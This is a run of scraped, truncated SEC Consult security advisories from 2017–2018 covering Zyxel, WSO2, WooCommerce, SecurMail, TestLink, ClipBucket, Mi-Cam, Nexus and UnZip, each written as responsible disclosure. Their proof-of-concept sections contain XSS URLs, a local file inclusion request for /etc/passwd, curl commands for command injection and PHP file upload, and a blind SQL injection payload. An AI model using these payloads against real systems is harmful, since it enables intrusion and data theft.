SEC Consult Vulnerability Lab Security Advisory < 20180424-0 > === title: Reflected Cross-Site Scripting product: Zyxel ZyWALL: see "Vulnerable / tested version" vulnerable version: ZLD 4.30 and before fixed version: ZLD 4.31 CVE number: - impact: Medium homepage: https://www.zyxel.com found: 2018-02-05 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally." Source: https://www.zyxel.com/about_zyxel/company_overview.shtml Business recommendation: SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Reflected Cross-Site Scripting (XSS) A reflected cross-site scripting vulnerability was identified in 'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is returned without any sanitization of the input. An attacker, for example, can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the device. Proof of concept: - 1) Reflected Cross-Site Scripting (XSS) By opening the following link, contents of the 'arip' and 'zy_pc_browser' cookies will be displayed. http:///free_time_failed.cgi?err_msg=alert(document.cookie); https:///free_time_failed.cgi?err_msg=alert(document.cookie); Vulnerable / tested versions: - The following versions are affected: Zyxel ZyWall USG 110 ZLD 4.30 and earlier Zyxel ZyWall USG 210 ZLD 4.30 and earlier Zyxel ZyWall USG 310 ZLD 4.30 and earlier Zyxel ZyWall USG 1100 ZLD 4.30 and earlier Zyxel ZyWall USG 1900 ZLD 4.30 and earlier Zyxel ZyWall USG 2200-VPN ZLD 4.30 and earlier Vendor contact timeline: 2018-02-07: Contacting vendor through secur...@zyxel.com.tw 2018-02-08: Vendor responded with contact information and a PGP key. Sent the encrypted advisory to the contact. 2018-02-09: Contact confirmed that the advisory was received. 2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL series is vulnerable to the reported vulnerability. The contact also stated that the vulnerability will be fixed until the end of March. Requested more information regarding version numbers and other affected devices. 2018-02-23: Contact confirmed that the devices are vulnerable in firmware version 4.30 and before. 2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31 and that it will be released on 2018-04-17. Shifted release of advisory to 2018-04-17. 2018-04-12: Informed the contact that the advisory will be released in few days. 2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new version on the customer portal. E-mail was blocked and returned. 2018-04-18: Found the new version (ZLD 4.31) on the customer portal. 2018-04-24: Advisory release. Solution: - Install firmware version ZLD 4.31 from the vendor's website to fix this issue: https://www.zyxel.com/support/download_landing.shtml Workaround: --- Restrict network access to the device. Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC
SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 > === title: Multiple Stored XSS Vulnerabilities product: WSO2 Carbon, WSO2 Dashboard Server vulnerable version: WSO2 Identity Server 5.3.0 fixed version: WSO2 Identity Server 5.5.0 CVE number: CVE-2018-8716 impact: high homepage: https://wso2.com/products/dashboard found: 2017-12-13 by: W. Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "WSO2 Carbon redefines middleware by providing an integrated and componentized middleware platform that adapts to the specific needs of any enterprise IT project - on premise or in the cloud. 100% open source and standards-based, WSO2 Carbon enables developers to rapidly orchestrate business processes, compose applications and develop services using WSO2 Developer Studio and a broad range of business and technical services that integrate with legacy, packaged and SaaS applications. The lean, complete, OSGi-based platform includes more than 175 components – OSGi bundles or Carbon features. The WSO2 Carbon core framework functions as “Eclipse for servers” and includes common capabilities shared by all WSO2 products, such as built-in registry, user management, transports, security, logging, clustering, caching and throttling services, co-ordination, and a GUI framework." Source: https://wso2.com/products/carbon/ "The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to rapidly create visually appealing and engaging web components such as dashboards, and gadgets, and unlocking data for business intelligence and monitoring. With the host of capabilities that Dashboard Server provides out-of-the-box, going from data to screen has never been easier." Source: https://wso2.com/products/dashboard-server/ Business recommendation: SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716) The dashboard is used by the end-users to manage their accounts, change passwords, alter their profiles, or change certain settings. An attacker is able to inject arbitrary JavaScript payloads into various textboxes (username, home address, lastname, firstname, etc). The payloads are permanently stored in the dashboard and triggered every time the dashboard is visited. The payload is also potentially triggered in the carbon part of WSO2, which means that an attacker would be able to inject payloads from the front-end application into a middleware application, which is not accessible from the internet and attack administrators. 2) Stored Cross-Site Scripting in WSO2 Carbon The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker host URL an arbitrary JavaScript payload can be injected and permanently stored in the web application. Proof of concept: - 1) Stored Cross-Site Scripting in WS02 Dashboard The following input fields are vulnerable and JavaScript payloads can be directly injected: - Firstname - Lastname - Username - Address It is suspected, that all user inputs are returned unfiltered in all server responses. 2) Stored Cross-Site Scripting in WSO2 Carbon To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set the URL to the following payload: "> Everytime the carbon middleware application is accessed, the payload is triggered. Vulnerable / tested versions: - The following version has been tested which was the most recent version at the time of discovery: * WSO2IS 5.3.0 Vendor contact timeline: 2018-01-25: Contacting vendor through secur...@wso2.com 2018-02-08: Asking for status update. Vendor responds, that they are still investigating the issue. 2018-02-21: Vendor responds with release date and further details concerning the nature of the vulnerabilities. The XSS in the Carbon component was a duplicate and should be already fixed. Concerning the XSS in the dashboard a fix is implemented and will be rolled out with the release of WSO2 Identity Server 5.5.0. 2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard. 2018-03-15: Mitre assigned CVE-2018-8716. 2018-03-26: Vendor informed us, that the final release of the updated software will be o
SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 > === title: Arbitrary Shortcode Execution & Local File Inclusion product: WOOF - WooCommerce Products Filter (PluginUs.Net) vulnerable version: 1.1.9 fixed version: 2.2.0 CVE number: (requested but not yet received) impact: Critical homepage: https://pluginus.net/ found: 2018-02-20 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "PluginUs.Net is a little team of talented professionals from Ukraine. Unlike most of the big companies on the net, we believe in individual approach to every our customer. Web development is our passion and we always try to go an extra mile over our clients' expectations. Our team specializes in development of WordPress plugins. It's always exciting to try new technologies and approaches to get the project done and impress clients by realization of their ideas!" Source: https://pluginus.net/about-us/ Business recommendation: SEC Consult recommends to ugprade to the latest version available as soon as possible. Further detailed security tests should be performed in order to identify potential other security issues. Vulnerability overview/description: --- 1. Arbitrary Shortcode Execution The plugin implemented a page redraw AJAX function accessible to anyone without any authentication. WordPress shortcode markup in the "shortcode" parameters would be evaluated. Normally unauthenticated users can't evaluate shortcodes as they are often sensitive. Additionally, it is noted that there are other implemented shortcodes that are being used in this plugin which can be abused through the same attack. Worst, some of them could lead to remote code execution. 2. Local File Inclusion The vulnerability is due to the lack of args/input validation on render_html before allowing it to be called by extract(), a PHP built-in function. Because of this, the supplied args/input can be used to overwrite the $pagepath variable which then could lead to local file inclusion attack. Proof of concept: - 1. Arbitrary Shortcode Execution The parameter "shortcode" within the "admin-ajax.php" script is affected by the code execution vulnerability: POST /wp-admin/admin-ajax.php HTTP/1.1 [...] action=woof_redraw_woof=<> 2. Local File Inclusion The parameter "shortcode" within the "admin-ajax.php" script is affected by the local file inclusion vulnerability: POST /wp-admin/admin-ajax.php HTTP/1.1 [...] action=woof_redraw_woof=woof_search_options pagepath=/etc/passwd Vulnerable / tested versions: - PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and found to be vulnerable. Vendor contact timeline: 2018-02-20: Contacting vendor through realmag...@gmail.com 2018-02-20: Vendor agreed to proceed without encrypted channel 2018-02-21: Sent security advisory to vendor 2018-02-26: Vendor sent patch containing the fixes 2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability 2018-03-12: Request update from vendor 2018-03-12: Vendor said they already published the patch 2018-03-14: Public release of security advisory Solution: - The vendor provides an updated version and users are urged to upgrade to version 2.2.0 immediately: https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/ Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/ind
SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 > === title: Multiple Critical Vulnerabilities product: SecurEnvoy SecurMail vulnerable version: 9.1.501 fixed version: 9.2.501 or hotfix patch "1_012018" CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704, CVE-2018-7705, CVE-2018-7706, CVE-2018-7707 impact: Critical homepage: https://www.securenvoy.com/ found: 2017-11 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Sending and receiving encrypted emails is not an easy or simple experience. Businesses rely on email with an increasing amount of sensitive data sent across their networks. A revolutionary approach that doesn't suffer from the overheads of deployment and encryption management; just rock-solid security to give you 100% confidence in your business communications." URL: https://www.securenvoy.com/products/securmail/key-features.shtm Business recommendation: During a brief crash test of the SecurEnvoy SecurMail application several severe vulnerabilities have been identified that break the core security promises of the product. These vulnerabilities open the possibility for several different attack scenarios that allow an attacker to read other users' encrypted e-mails and overwrite or delete e-mails stored in other users' inboxes. As we have identified several critical vulnerabilities within a very short time frame we expect numerous other vulnerabilities to be present. As other SecureEnvoy products (besides the analyzed SecurMail) appear to be highly integrated (all products are installed with a single setup file) we suspect other components to also suffer from severe security deficits. We recommend not to use SecurEnvoy products (especially SecurMail) in a production environment until: * a comprehensive security audit has been performed and * state of the art security mechanisms have been adopted. Vulnerability overview/description: --- 1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707) SEC Consult did not find any functionality that encodes user input when creating HTML pages. Therefore persistent and reflected cross site scripting attacks are possible throughout the application. Some pages fail to properly decode URL encoded parameters. Because of this, cross site scripting cannot be exploited on these pages in most browsers. 2) Path Traversal (CVE-2018-7705, CVE-2018-7706) SEC Consult did not find any path traversal checks throughout the application. Since the application uses encrypted files as the primary method of data storage, this vulnerability can be exploited at several points. Using this vulnerability, a legitimate recipient can read mails sent to other recipients in plain text! 3) Insecure Direct Object Reference (CVE-2018-7704) Authorization checks are only partially implemented. This allows a legitimate recipient to read mails sent to other users in plain text. 4) Missing Authentication and Authorization (CVE-2018-7702) In order to send encrypted e-mails a client does not need to authenticate on the SecurEnvoy server. Therefore anyone with network access to the server can arbitrarily send e-mails that appear to come from an arbitrary sender address. Moreover, an attacker with network access to the server can re-send previous communication to arbitrary recipients. This allows him/her to extract all e-mails stored on the server. An attacker could also modify arbitrary messages stored on the server. 5) Cross Site Request Forgery (CVE-2018-7701) SEC Consult did not find any protection against cross site request forgery. An attacker could use this vulnerability to delete a victim's e-mail or to impersonate the victim and reply to his/her e-mails. Since these vulnerabilities were found during a very short time frame, SEC Consult believes that the product may contain a large number of other security vulnerabilities. As already several core security promises have been broken during this short crash test, no further tests were conducted. Proof of concept: - 1) Cross Site Scripting a) The following HTML fragments demonstrates reflected cross site scripting (CVE-2018-7703): --- snip --- --- snip --- b) E-mails that are sent using the HTML format can contain any
SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 > === title: Insecure Direct Object Reference product: TestLink Open Source Test Management vulnerable version: <1.9.17 fixed version: 1.9.17 (after November 2017), and the current "testlink_1_9" branch CVE number: - impact: Medium homepage: http://testlink.org/ found: 2017-09-22 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "TestLink is a web based test management and test execution system. It enables quality assurance teams to create and manage their test cases as well as to organize them into test plans. These test plans allow team members to execute test cases and track test results dynamically." Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code Business recommendation: SEC Consult advises to immediately install the available updates as attackers might gain access to sensitive data belonging to other users. A thorough security review performed by security professionals is highly recommended in order to identify potential further security deficiencies. Vulnerability overview/description: --- 1) Insecure Direct Object Reference An unauthenticated user can gain access to referenced files which are produced by different test cases. By using a simple ID iterator, all produced output data can be gathered from the whole system. The actual impact strongly depends on the classification of the produced data which is referenced. Therefore, the risk can vary from low to critical depending on the use case. Proof of concept: - 1) Insecure Direct Object Reference An unauthenticated attacker can download data from the TestLink environment by using the following url: http:///lib/attachments/attachmentdownload.php?skipCheck=1= The tag specifies the target address and can also include a sub- folder where the hosted TestLink application is located. Vulnerable / tested versions: - The following versions have been tested and are vulnerable. It is assumed that older versions are affected as well, e.g.: * 1.9.16 * 1.9.15 * 1.9.14 Vendor contact timeline: 2017-10-18: Contacting vendor through http://mantis.testlink.org Vendor requested the information. 2017-10-19: Asked if the advisory should be uploaded to mantis directly. 2017-10-21: Contact agreed. 2017-10-23: Uploaded the advisory to mantis. 2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for 1.9.15 and 1.9.14 too. Vendor asked us for verification. 2017-11-07: Stated that verification is not possible at the moment (no test instance) and that it can be verified easily with the PoC 2018-01-09: Asked for status update; No answer. 2018-01-29: Asked for status update; No answer. 2018-02-16: Asked for status update. 2018-02-17: Vendor responded that we can re-check the fix or release the advisory. 2018-02-19: Asked the vendor for reachable test-instance, reply: there is no test instance 2018-02-28: Public release of security advisory Solution: - Check-out the current testlink-code on branch "testlink_1_9": https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/ The following commit contains the fix since 2017-11-01: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d Upgrade to 1.9.17 (after November 2017). Workaround: --- Restrict network access and do not expose the TestLink interface to the internet. Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Henc
SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 > === title: OS command injection, arbitrary file upload & SQL injection product: ClipBucket vulnerable version: <4.0.0 - Release 4902 fixed version: 4.0.0 - Release 4902 CVE number: - impact: critical homepage: http://clipbucket.com/ found: 2017-09-06 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) Wan Ikram (Office Kuala Lumpur) Fikri Fadzil (Office Kuala Lumpur) Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "ClipBucket is a free and open source software which helps us to create a complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu in few minutes of setup. It was first created in 2007 by Arslan Hassan and his team of developers. ClipBucket was developed as a YouTube clone but has been upgraded with advanced features and enhancements. It uses FFMPEG for video conversion and thumbs generation which is the most widely used application so, users can stream it straight away using the Video JS and HTML 5 Players." Source: https://clipbucket.com/about Business recommendation: By exploiting the vulnerabilities documented in this advisory, an attacker can fully compromise the web server which has ClipBucket installed. Potentially sensitive data might get exposed through this attack. Users are advised to immediately install the patched version provided by the vendor. Vulnerability overview/description: --- 1. Unauthenticated OS Command Injection Any OS commands can be injected by an unauthenticated attacker. This is a serious vulnerability as the chances for the system to be fully compromised is very high. This same vulnerability can also be exploited by authenticated attackers with normal user privileges. 2. Unauthenticated Arbitrary File Upload A malicious file can be uploaded into the webserver by an unauthenticated attacker. It is possible for an attacker to upload a script to issue operating system commands. This same vulnerability can also be exploited by an authenticated attacker with normal user privileges. 3. Unauthenticated Blind SQL Injection The identified SQL injection vulnerabilities enable an attacker to execute arbitrary SQL commands on the underlying MySQL server. Proof of concept: - 1. Unauthenticated OS Command Injection Without having to authenticate, an attacker can exploit this vulnerability by manipulating the "file_name" parameter during the file upload in the script /api/file_uploader.php: $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>" http://$HOST/api/file_uploader.php Alternatively, this vulnerability can also be exploited by authenticated basic privileged users with the following payload by exploiting the same issue in /actions/file_downloader.php: $ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4_name=abc || <>" "http://$HOST/actions/file_downloader.php; 2. Unauthenticated Arbitrary File Upload Below is the cURL request to upload arbitrary files to the webserver with no authentication required. $ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/beats_uploader.php; $ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/photo_uploader.php; Furthermore, this vulnerability is also available to authenticated users with basic privileges: $ curl --cookie "[--SNIP--]" -F "coverPhoto=@valid-image-with-appended-phpcode.php" "http://$HOST/edit_account.php?mode=avatar_bg; 3. Unauthenticated Blind SQL Injection The following parameters have been identified to be vulnerable against unauthenticated blind SQL injection. URL : http://$HOST/actions/vote_channel.php METHOD : POST PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand()) The source code excerpt below shows the vulnerable code VULN. FILE : /actions/vote_channel.php VULN. CODE : [...] $vote = $_POST["vote"]; $userid = $_POST["channelId"]; //if($userquery->login_check('',true)){ if($vote == "yes"){ $query = "UPDATE " . tbl("users") . " SET
SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors
We have published an accompanying blog post to this technical advisory with further information: https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html SEC Consult Vulnerability Lab Security Advisory < 20180221-0 > === title: Hijacking of arbitrary video baby monitors product: miSafes Mi-Cam remote video monitor vulnerable version: Android application v1.2.0, iOS v1.0.5 Firmware v1.0.38 fixed version: - CVE number: - impact: critical homepage: http://www.misafes.com/mi-cam found: 2017-11-30 by: Mathias Frank (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy set up & use, two-way talk and supports free local video recording, all can be use by our user friendly Mi-Cam app." Source: http://www.misafes.com/mi-cam Business recommendation: SEC Consult recommends not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved! Although cloud-connected hardware may have an advantage regarding usability and convenience for users, if security is lacking those products pose a great risk for all customers. Furthermore, it seems there exist similar products from other vendors, e.g. "Qihoo 360 Smart Home Camera", that look exactly the same and may also be affected but SEC Consult could not verify this. The cloud component hosted by "qiwocloud2.com" may be used by other products as well. Additional information regarding other vendors are described in our blog post linked at the top of this advisory. Vulnerability overview/description: --- The usage of the Mi-Cam video baby monitor and its Android (or iOS) application, involves numerous requests to a cloud infrastructure available at ipcam.qiwocloud2.com with the aim of communicating with the video baby monitor or respective Android application. The Android application has at least 5-10 installations according to Google Play Store with potentially as many iOS users as well. SEC Consult has identified multiple critical security issues within this product. 1) Broken Session Management & Insecure Direct Object References The usage of the Android application "Mi-Cam" and the interaction with the video baby monitor involves several different API calls. A number of critical API calls can be accessed by an attacker with arbitrary session tokens because of broken session management. This allows an attacker to retrieve information about the supplied account and its connected video baby monitors. Information retrieved by this feature is sufficient to view and interact with all connected video baby monitors for the supplied UID. 2) Missing Password Change Verification Code Invalidation The password forget functionality sends a 6-digit validation key which is valid for 30 minutes to the supplied email address in order to set a new password. Multiple codes can be requested though while previously delivered codes do not get invalidated and anyone of them can be used as a valid key. This can easily be brute-forced to take over other accounts. 3) Available Serial Interface The PCB of the video baby monitor holds an unlabeled UART interface where an attacker is able to get hardware level access to the device and for instance extract the firmware for further analysis. SEC Consult identified further security issues such as outdated software (issue 6) or weak passwords (issue 4) by analyzing the firmware using IoT Inspector (https://www.iot-inspector.com). 4) Weak Default Credentials The "root" user available on the video baby monitor uses very weak default credentials with only 4 digits. 5) Enumeration of user accounts The password reset functionality leaks information about the existence of supplied user accounts which can aid in further (brute-force) attacks. 6) Outdated and Vulnerable Software Several software components which are affected by publicly known vulnerabilities were identified in the firmware of the video baby monitor. Proof of concept: - As the vendor could not be reached in order to get the issues fixed we will omit detailed proof of concept information in this advisory. 1) Broke
SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 > === title: Multiple Cross-Site Scripting Vulnerabilities product: Sonatype Nexus Repository Manager OSS/Pro vulnerable version: <=2.14.5, <=3.7.1 fixed version: 2.14.6, 3.8.0 CVE number: CVE-2018-5306, CVE-2018-5307 impact: Medium homepage: https://www.sonatype.com/ found: 2017-12-12 by: Werner Schober, Daniel Ostovary (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "At Sonatype we have a long history of partnership with the world of open source software development. From our humble beginning as core contributors to Apache Maven, to supporting the world’s largest repository of open source components (Central), to distributing the world's most popular repository manager (Nexus), we exist for one simple reason; to help accelerate software innovation." Source: https://www.sonatype.com/about-sonatype Business recommendation: The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities which could be used by an attacker to execute JavaScript code in the user's browser. The vendor provides a patch for both version 2 and 3 of the product which should be installed immediately. It is recommended to conduct a thorough security review by IT security professionals in order to identify potential other security issues. Vulnerability overview/description: --- 1) Reflected XSS vulnerability The parameters "repoId" and "format" of the "healthCheckFileDetail" function are vulnerable to reflected XSS. If the attacker can lure a user into clicking a crafted link he could execute arbitrary JavaScript code. In case the user has sufficient permissions, an attacker can create arbitrary (administrative) users or perform stored XSS attacks (see 2). 2) Stored XSS vulnerabilities The application is vulnerable to multiple stored XSS vulnerabilities, which are described in the following list. 2.1) The first one is located in the "File Upload" functionality of the "Staging Upload". Uploading a file with JavaScript code in its name allows to store JavaScript code, which gets triggered every time the file name is shown (e.g. in "Repositories"). 2.2) The second stored XSS vulnerability is more precisely being considered as stored DOM injection. This vulnerability affects the functionality of creating a new user. When doing so it is possible to inject JavaScript/HTML code in the username, which later gets rendered/executed every time the username is displayed. 2.3) The third stored XSS vulnerability is also a stored DOM injection. It affects the "IQ Server Connection"/"IQ Server Dashboard" functionality. The "IQ Server URL" field in the "IQ Server Connection" allows to inject JavaScript/HTML code into the menu bulletpoint "IQ Server Dashboard". The vendor provided the following CVE numbers: * CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3 * CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2 Proof of concept: - 1) Reflected XSS vulnerability By luring an attacker into clicking the following link, an arbitrary JavaScript payload will be executed: https://example.com/nexus/service/siesta/healthcheck/healthCheckFile Detail/.../index.html?repoId=public=sectest Vulnerable parameters: -) repoId -) format 2) Stored XSS vulnerabilities ***Please note that only users with access to the respective functionalities are susceptive to the following stored XSS vulnerabilities.*** 2.1) The staging upload allows an attacker to upload a file, which contains a JavaScript payload in the filename. An example for a filename containing a "malicious" payload is as follows: ".jpg" This file can be uploaded flawlessly and everytime the filename is displayed, the JavaScript payload gets executed. 2.2) An attacker is able to create a new user, which contains a malicious JavaScript payload in the username. As an example the following username can be used: "EvilAdmin Create Repository -> Access repository via "Repositories" -> JavaScript code is being executed) 2.3) The nexus server allows to setup an IQ server connection. The server name is not validated and therefore allows the permanent injection of JavaScript code. To demonstrate the vulnerability
SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip
SEC Consult Vulnerability Lab Security Advisory < 20180207-0 > === title: Multiple buffer overflow vulnerabilities product: InfoZip UnZip vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22 fixed version: 6.10c23 CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133 CVE-2018-134,CVE-2018-135 impact: high homepage: http://www.info-zip.org/UnZip.html found: 2017-11-03 by: R. Freingruber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "UnZip is an extraction utility for archives compressed in .zip format (also called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our primary objectives have been portability and non-MSDOS functionality. UnZip will list, test, or extract files from a .zip archive, commonly found on MS-DOS systems. The default behavior (with no options) is to extract into the current directory (and subdirectories below it) all files from the specified zipfile." Source: http://www.info-zip.org/UnZip.html InfoZip's UnZip is used as default utility for uncompressing ZIP archives on nearly all *nix systems. It gets shipped with many commerical products on Windows to provide (un)compressing functionality as well. Business recommendation: InfoZip Unzip should be updated to the latest available version. Vulnerability overview/description: --- 1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135) InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing password protected ZIP archives. An attacker can exploit this vulnerability to overwrite heap chunks to get arbitrary code execution on the target system. For newer builds the risk for this vulnerability is partially mitigated because modern compilers automatically replace unsafe functions with length checking variants of the same function (for example sprintf gets replaced by sprintf_chk). This is done by the compiler at locations were the length of the destination buffer can be calculated. Nevertheless, it must be mentioned that UnZip is used on many systems including older systems or on exotic architectures on which this protection is not in place. Moreover, pre-compiled binaries which can be found on the internet lack the protection because the last major release of InfoZip's UnZip was in 2009 and compilers didn't enable this protection per default at that time. The required compiler flags are also not set in the Makefile of UnZip. Compiled applications are therefore only protected if the used compiler has this protection enabled per default which is only the case with modern compilers. To trigger this vulnerability (and the following) it's enough to uncompress a manipulated ZIP archive. Any of the following invocations can be used to trigger and abuse the vulnerabilities: >unzip malicious.zip >unzip -p malicious.zip >unzip -t malicious.zip 2) Heap-based out-of-bounds write (CVE-2018-131) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap-based out-of-bounds write if the archive filename does not contain a .zip suffix. 3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap/BSS-based buffer-overflow which can be used to write null-bytes out-of-bound when converting attacker-controlled strings to the local charset. 4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap out-of-bounds access vulnerability. 5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134) This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA implementation. Various crash dumps have been supplied to the vendor but no further analysis has been performed. Proof of concept: - 1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135) Unzipping a malicious archive results in the following output: (On Ubuntu 16.04 with UnZip 6.0 which was installed via aptitude install unzip)
SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range
